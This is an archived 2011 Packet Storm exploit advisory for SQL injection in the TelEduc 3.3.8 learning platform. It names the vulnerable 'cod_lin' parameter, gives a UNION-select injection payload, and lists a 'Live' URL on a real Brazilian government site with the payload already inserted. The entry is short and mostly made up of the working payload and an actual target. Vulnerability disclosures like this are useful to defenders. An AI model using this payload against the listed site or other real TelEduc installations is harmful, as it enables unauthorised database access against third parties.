TelEduc 3.3.8 SQL Injection

2011-06-12T00:00:00
ID PACKETSTORM:102197
Type packetstorm
Reporter s4r4d0
Modified 2011-06-12T00:00:00

Description

                                        
                                            `# By s4r4d0 - 2011 © # Made in Brazil   
#########################################################################  
# TelEduc Version 3.3.8  
#########################################################################   
# Name: TelEduc Version 3.3.8 ( SQL Injection Vulnerability )   
# Download: http://www.teleduc.org.br/pagina/download-teleduc/   
# Date: 12/06/2011   
# Author: s4r4d0   
# E-mail: s4r4d0[at]yhaoo[dot]com   
# Team: Fatal Error   
# Twitter: www.twitter.com/fatalerrorcrew   
================================================================================  
================================================================================   
[#] vuln:  
http://www.example.com.br/~teleduc/pagina_inicial/index.php?cod_lin=[SQLi]   
  
[#] Exploit:   
-9999 union select 1,@@version--   
  
[#] Live:  
http://www.eadpm.polmil.sp.gov.br/~teleduc/pagina_inicial/index.php?cod_lin=-9999 union select 1,@@version--   
================================================================================  
================================================================================  
`